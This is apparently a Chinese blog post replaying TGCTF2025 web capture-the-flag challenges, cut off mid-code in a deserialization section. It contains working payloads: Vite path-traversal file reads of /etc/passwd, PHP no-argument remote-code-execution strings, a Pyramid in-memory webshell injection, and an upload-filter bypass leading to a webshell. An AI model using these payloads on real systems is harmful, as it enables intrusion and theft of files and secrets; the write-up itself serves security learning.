<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta property="og:type" content="article">
<meta property="og:title" content="TGCTF2025复现">
<meta property="og:url" content="http://example.com/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="路漫漫其修远兮 吾将上下而求索">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_19-11-53.png">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_19-16-17.png">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_19-19-56.png">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_19-27-26.png">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_20-50-37.png">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_21-19-44.png">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_21-29-58.png">
<meta property="og:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_21-32-14.png">
<meta property="article:published_time" content="2025-04-17T14:45:34.000Z">
<meta property="article:modified_time" content="2025-04-18T13:33:55.711Z">
<meta property="article:author" content="Cnext">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/tgctf_images/Snipaste_2025-04-18_19-11-53.png">

<link rel="canonical" href="http://example.com/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>TGCTF2025复现 | 路漫漫其修远兮 吾将上下而求索</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">路漫漫其修远兮 吾将上下而求索</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Cnext">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="路漫漫其修远兮 吾将上下而求索">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          TGCTF2025复现
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-04-17 22:45:34" itemprop="dateCreated datePublished" datetime="2025-04-17T22:45:34+08:00">2025-04-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-04-18 21:33:55" itemprop="dateModified" datetime="2025-04-18T21:33:55+08:00">2025-04-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <html><head></head><body><h1 id="TGCTF2025复现"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#TGCTF2025复现" class="headerlink" title="TGCTF2025复现"></a>TGCTF2025复现</h1><h2 id="前言"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#前言" class="headerlink" title="前言"></a>前言</h2><p>这次的tgctf也是一个不可多得好比赛，web总共15道，打了将近一半吧，有些题开始做的时候没什么思路，看了wp发现还是经验不足了，呜呜呜呜，想到明年就不是小登了，还要被小登创飞。</p>
<h2 id="前端game"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#前端game" class="headerlink" title="前端game"></a>前端game</h2><p><img src="/tgctf_images/Snipaste_2025-04-18_19-11-53.png" alt="图片"></p>
<p>进入是一个前端小游戏页面，看了源码，数据报都没发现什么奇怪的地方，但是看到url栏上的#，我就知道这是一个vue前端，一般是搭配vate服务器使用的，查查这两个东西相关的漏洞，还真给我找到了，具体来说有三个相关的cve，都是文件读取漏洞</p>
<p>CVE-2025-30208</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/@fs/etc/passwd?import&amp;raw??</span><br><span class="line">/@fs/etc/passwd?raw??</span><br><span class="line"></span><br><span class="line">/@fs/tgflagggg?import&amp;raw??</span><br><span class="line">/@fs/tgflagggg?raw??</span><br></pre></td></tr></tbody></table></figure>

<p><img src="/tgctf_images/Snipaste_2025-04-18_19-16-17.png" alt="图片"></p>
<p>成功读取到文件</p>
<h2 id="前端gameplus"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#前端gameplus" class="headerlink" title="前端gameplus"></a>前端gameplus</h2><p>升级版，没错，又是cve漏洞，还是文件读取</p>
<p>CVE-2025-31486</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/etc/passwd?.svg?.wasm?init</span><br><span class="line"> /tgflagggg?.svg?.wasm?init</span><br><span class="line"> #</span><br><span class="line">这个打法，不太好猜路径</span><br><span class="line">curl "http node1.tgctf.woooo.tech:32613/@fs/app/?/ / / / / /tgflagggg?</span><br><span class="line"> import&amp;?raw</span><br></pre></td></tr></tbody></table></figure>

<p><img src="/tgctf_images/Snipaste_2025-04-18_19-19-56.png"></p>
<h2 id="前端game-ultral"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#前端game-ultral" class="headerlink" title="前端game ultral"></a>前端game ultral</h2><p>没错，还是cve漏洞，</p>
<p>CVE-2025-32395</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">访问/@fs/tmp/获得绝对路径/app，同时给了附件看docker也能看出路径</span><br><span class="line"></span><br><span class="line">curl --request-target /@fs/app/#/ / / / / /etc/passwd http://node1.tgctf.woooo.tech:32742/</span><br><span class="line">curl --request-target /@fs/app/#/ / / / / /tgflagggg http://node2.tgctf.woooo.tech:31500/</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>

<h2 id="偷渡阴平"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#偷渡阴平" class="headerlink" title="偷渡阴平"></a>偷渡阴平</h2><p>无参数rce，可利用的方法有很多，session_id绕过waf，getheader绕过waf等等</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$tgctf2025=$_GET['tgctf2025'];</span><br><span class="line"></span><br><span class="line">if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\&lt;|\.|\&gt;|\/|\?|\\\\/i", $tgctf2025)){</span><br><span class="line"></span><br><span class="line">//hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushi</span><br><span class="line"></span><br><span class="line">eval($tgctf2025);</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">else{</span><br><span class="line"></span><br><span class="line">die('(╯‵□′)╯炸弹！•••*～●');</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>常规思路都被堵死了，</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));来查看根目录下的文件，也是成功读取到flag文件在根目录下</span><br></pre></td></tr></tbody></table></figure>

<p>paylaod构造</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tgctf2025=readfile(end(getallheaders()));</span><br></pre></td></tr></tbody></table></figure>

<p>在数据报中传入/flag就可以了</p>
<p><img src="/tgctf_images/Snipaste_2025-04-18_19-27-26.png"></p>
<p>也可以使用</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?tgctf2025=session_start();system(hex2bin(session_id())); PHPSESSID=636174202f666c6167       cat /flag的十六进制</span><br><span class="line"></span><br><span class="line">?tgctf2025=eval(end(current(get_defined_vars())));&amp;b=system('cat /flag');</span><br></pre></td></tr></tbody></table></figure>

<h2 id="偷渡阴平（复仇）"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#偷渡阴平（复仇）" class="headerlink" title="偷渡阴平（复仇）"></a>偷渡阴平（复仇）</h2><figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> $tgctf2025=$_GET['tgctf2025']</span><br><span class="line">  if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#| $|\%|\^|\&amp;|\*|\</span><br><span class="line">（</span><br><span class="line">|\</span><br><span class="line">）</span><br><span class="line">|\ \ \+|\ \</span><br><span class="line"> \]|\}|\:|\'|\"|\,|\ \.|\&gt;|\/|\?</span><br><span class="line"> |\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|spli</span><br><span class="line"> t|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|di</span><br><span class="line"> r|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|</span><br><span class="line"> rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i"</span><br><span class="line"> , $tgctf2025)){</span><br><span class="line"> hint</span><br><span class="line">：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（</span><br><span class="line">bushi</span><br><span class="line"> }</span><br><span class="line"> else{</span><br><span class="line"> die('(╯‵ □′)╯炸弹！•••*～●');</span><br><span class="line"> }</span><br><span class="line"> highlight_file( FILE )</span><br></pre></td></tr></tbody></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?tgctf2025=session_start();system(hex2bin(session_id()));</span><br><span class="line">PHPSESSID=636174202f666c6167   </span><br></pre></td></tr></tbody></table></figure>

<p>其他解法</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?tgctf2025=system(implode(apache_request_headers()))</span><br></pre></td></tr></tbody></table></figure>

<h2 id="熟悉的配方，熟悉的味-道"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#熟悉的配方，熟悉的味-道" class="headerlink" title="熟悉的配方，熟悉的味 道"></a>熟悉的配方，熟悉的味 道</h2><p>pyramid内存马</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">from pyramid.config import Configurator</span><br><span class="line">from pyramid.request import Request</span><br><span class="line">from pyramid.response import Response</span><br><span class="line">from pyramid.view import view_config</span><br><span class="line">from wsgiref.simple_server import make_server</span><br><span class="line">from pyramid.events import NewResponse</span><br><span class="line">import re</span><br><span class="line">from jinja2 import Environment, BaseLoader</span><br><span class="line"></span><br><span class="line">eval_globals = { #防止eval执行恶意代码</span><br><span class="line">    '__builtins__': {},      # 禁用所有内置函数</span><br><span class="line">    '__import__': None       # 禁止动态导入</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def checkExpr(expr_input):</span><br><span class="line">    expr = re.split(r"[-+*/]", expr_input)</span><br><span class="line">    print(exec(expr_input))</span><br><span class="line"></span><br><span class="line">    if len(expr) != 2:</span><br><span class="line">        return 0</span><br><span class="line">    try:</span><br><span class="line">        int(expr[0])</span><br><span class="line">        int(expr[1])</span><br><span class="line">    except:</span><br><span class="line">        return 0</span><br><span class="line"></span><br><span class="line">    return 1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def home_view(request):</span><br><span class="line">    expr_input = ""</span><br><span class="line">    result = ""</span><br><span class="line"></span><br><span class="line">    if request.method == 'POST':</span><br><span class="line">        expr_input = request.POST['expr']</span><br><span class="line">        if checkExpr(expr_input):</span><br><span class="line">            try:</span><br><span class="line">                result = eval(expr_input, eval_globals)</span><br><span class="line">            except Exception as e:</span><br><span class="line">                result = e</span><br><span class="line">        else:</span><br><span class="line">            result = "爬！"</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    template_str = 【xxx】</span><br><span class="line"></span><br><span class="line">    env = Environment(loader=BaseLoader())</span><br><span class="line">    template = env.from_string(template_str)</span><br><span class="line">    rendered = template.render(expr_input=expr_input, result=result)</span><br><span class="line">    return Response(rendered)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == '__main__':</span><br><span class="line">    with Configurator() as config:</span><br><span class="line">        config.add_route('home_view', '/')</span><br><span class="line">        config.add_view(home_view, route_name='home_view')</span><br><span class="line">        app = config.make_wsgi_app()</span><br><span class="line"></span><br><span class="line">    server = make_server('0.0.0.0', 9040, app)</span><br><span class="line">    server.serve_forever()</span><br></pre></td></tr></tbody></table></figure>

<p>说实话，内存马还是第一次见到，打完这个就得去好好研究一波了</p>
<p>根据官方的wp来说，eval进行了严格的限制，其实是用来迷惑的，可以传入exec，是用来打内存马的</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">expr=exec("config.add_route('shell_route','/17shell');config.add_view(lambda request:Response(__import__('os').popen(request.params.get('1')).read()),route_name='shell_route');app = config.make_wsgi_app()")</span><br><span class="line"></span><br><span class="line">/17shell?1=ls /</span><br></pre></td></tr></tbody></table></figure>

<p>还是打不进去，暂且放在这，待我好好研究一下吧</p>
<h2 id="ezuploads"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#ezuploads" class="headerlink" title="ezuploads"></a>ezuploads</h2><p>简单的文件上传，有点坑，dirsearch扫文件的时候，扫不出来bak后缀，还是我自己手动试出来的，下载upload.php.bak</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">define('UPLOAD_PATH', __DIR__ . '/uploads/');</span><br><span class="line">$is_upload = false;</span><br><span class="line">$msg = null;</span><br><span class="line">$status_code = 200; // 默认状态码为 200</span><br><span class="line">if (isset($_POST['submit'])) {</span><br><span class="line">    if (file_exists(UPLOAD_PATH)) {</span><br><span class="line">        $deny_ext = array("php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess");</span><br><span class="line"></span><br><span class="line">        if (isset($_GET['name'])) {</span><br><span class="line">            $file_name = $_GET['name'];</span><br><span class="line">        } else {</span><br><span class="line">            $file_name = basename($_FILES['name']['name']);</span><br><span class="line">        }</span><br><span class="line">        $file_ext = pathinfo($file_name, PATHINFO_EXTENSION);</span><br><span class="line"></span><br><span class="line">        if (!in_array($file_ext, $deny_ext)) {</span><br><span class="line">            $temp_file = $_FILES['name']['tmp_name'];</span><br><span class="line">            $file_content = file_get_contents($temp_file);</span><br><span class="line"></span><br><span class="line">            if (preg_match('/.+?&lt;/s', $file_content)) {</span><br><span class="line">                $msg = '文件内容包含非法字符，禁止上传！';</span><br><span class="line">                $status_code = 403; // 403 表示禁止访问</span><br><span class="line">            } else {</span><br><span class="line">                $img_path = UPLOAD_PATH . $file_name;</span><br><span class="line">                if (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line">                    $is_upload = true;</span><br><span class="line">                    $msg = '文件上传成功！';</span><br><span class="line">                } else {</span><br><span class="line">                    $msg = '上传出错！';</span><br><span class="line">                    $status_code = 500; // 500 表示服务器内部错误</span><br><span class="line">                }</span><br><span class="line">            }</span><br><span class="line">        } else {</span><br><span class="line">            $msg = '禁止保存为该类型文件！';</span><br><span class="line">            $status_code = 403; // 403 表示禁止访问</span><br><span class="line">        }</span><br><span class="line">    } else {</span><br><span class="line">        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';</span><br><span class="line">        $status_code = 404; // 404 表示资源未找到</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// 设置 HTTP 状态码</span><br><span class="line">http_response_code($status_code);</span><br><span class="line"></span><br><span class="line">// 输出结果</span><br><span class="line">echo json_encode([</span><br><span class="line">    'status_code' =&gt; $status_code,</span><br><span class="line">    'msg' =&gt; $msg,</span><br><span class="line">]);</span><br></pre></td></tr></tbody></table></figure>

<p>一眼丁真，move_uploaded_file的函数的漏洞，仔细看源码，文件名是由传入的name的值决定的，于是只需要get传参1.php/.就能绕过后缀名检测，然后针对内容检测，我塞了100万个垃圾数据，再传个一句话，蚁剑一连，打开终端读环境变量就可以了</p>
<h2 id="火眼辩魑魅"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#火眼辩魑魅" class="headerlink" title="火眼辩魑魅"></a>火眼辩魑魅</h2><p>robots.txt 直接打 tgshell.php</p>
<p>无过滤，直接连蚁剑</p>
<h2 id="什么文件上传？"><a href="/2025/04/17/TGCTF2025%E5%A4%8D%E7%8E%B0/#什么文件上传？" class="headerlink" title="什么文件上传？"></a>什么文件上传？</h2><p>robots.txt 进去有 class.php ，简单的反序列化</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">yesterday</span> </span>{</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$learn</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$study</span>=<span class="string">"study"</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$try</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>{</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;learn = <span class="string">"learn&lt;br&gt;"</span>;</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>{</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"You studied hard yesterday.&lt;br&gt;"</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;study-&gt;<span class="title function_ invoke__">hard</span>();</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">today</span> </span>{</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$doing</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$did</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$done</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;did = <span class="string">"What you did makes you outstanding.&lt;br&gt;"</span>;</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">public</span> <span 